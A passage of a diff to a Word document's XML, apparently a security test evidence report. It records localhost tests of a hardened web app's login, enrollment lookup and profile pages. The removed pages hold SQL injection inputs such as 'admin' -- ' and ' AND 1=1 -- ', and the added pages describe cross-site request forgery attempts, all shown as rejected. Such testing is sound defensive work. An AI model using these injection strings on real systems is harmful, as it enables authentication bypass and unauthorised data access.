         </w:rPr>
-        <w:t>Page 29 of 41</w:t>
+        <w:t>Page 30 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5654,104 +5865,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Csrf Token Origin</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Input or attack setup: POST from http://localhost:8001 with session cookie but no token</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: HTTP 403: server-side token and Origin verification rejected the request.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:47.138Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe/profile</w:t>
+        <w:t>Safe Version Csrf Setup</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: External HTML form posts email=attacker@lab.invalid to localhost:8000 without a CSRF token</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Attacker form is hosted on a separate origin, localhost:8001.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:15.047Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8001/safe?manual=1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5776,7 +5986,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="742A1058">
+        <w:pict w14:anchorId="113DDF7F">
           <v:shape id="_x0000_i1050" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId29" o:title=""/>
           </v:shape>
@@ -5805,7 +6015,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 30 of 41</w:t>
+        <w:t>Page 31 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5841,104 +6051,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Sqli Easy</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Input or attack setup: username=admin' -- ; password=wrong</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Invalid credentials; attack rejected.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:47.705Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe/login</w:t>
+        <w:t>Safe Version Csrf Response</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: External POST: email=attacker@lab.invalid; no CSRF token</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: HTTP 403: authenticated forged request rejected by token and Origin checks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:15.547Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe/profile</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5963,7 +6172,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="0CC1F5D6">
+        <w:pict w14:anchorId="0DB3C68F">
           <v:shape id="_x0000_i1051" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId30" o:title=""/>
           </v:shape>
@@ -5992,7 +6201,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 31 of 41</w:t>
+        <w:t>Page 32 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6028,104 +6237,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Sqli Intermediate True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND 1=1 -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: No matching enrollment</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:48.208Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe/enrollment?reference=ENR-2026-001%27+AND+1%3D1+--+</w:t>
+        <w:t>Safe Version Csrf After</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: External POST followed by authenticated profile verification</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Original email remains unchanged.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:16.026Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe/profile</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6150,7 +6358,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="0800BB95">
+        <w:pict w14:anchorId="44D51100">
           <v:shape id="_x0000_i1052" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId31" o:title=""/>
           </v:shape>
@@ -6179,7 +6387,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 32 of 41</w:t>
+        <w:t>Page 33 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6215,104 +6423,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Sqli Intermediate False</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND 1=2 -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: No matching enrollment</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:48.713Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe/enrollment?reference=ENR-2026-001%27+AND+1%3D2+--+</w:t>
+        <w:t>Safe Version Csrf Token Origin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: POST from http://localhost:8001 with session cookie but no token</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: HTTP 403: server-side token and Origin verification rejected the request.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
